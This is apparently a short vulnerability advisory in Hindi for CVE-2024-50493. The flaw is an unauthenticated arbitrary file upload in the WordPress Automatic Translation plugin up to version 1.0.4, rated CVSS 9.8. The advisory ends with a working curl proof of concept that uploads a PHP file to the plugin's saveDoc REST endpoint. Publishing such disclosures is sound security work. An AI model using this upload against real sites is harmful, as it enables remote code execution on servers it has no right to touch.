
Automatic Translation <= 1.0.4 - अनधिकृत मनमानी फ़ाइल अपलोड
Automatic Translation <= 1.0.4 - अप्रमाणित मनमाना फ़ाइल अपलोड
WordPress के लिए Automatic Translation प्लगइन सभी संस्करणों में, 1.0.4 तक और इसमें शामिल, फ़ाइल प्रकार सत्यापन की कमी के कारण मनमानी फ़ाइल अपलोड के लिए संवेदनशील है। इससे अप्रमाणित हमलावरों के लिए प्रभावित साइट के सर्वर पर मनमानी फ़ाइलें अपलोड करना संभव हो जाता है, जिससे दूरस्थ कोड निष्पादन संभव हो सकता है।
CVE: CVE-2024-50493
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: automatic-translation
curl -X POST \
-F "file_name=info.php" \
-F "file_url=@/tmp/info.php" \
"http://kubernetes.docker.internal/wp-json/automatic-translator/v1/saveDoc"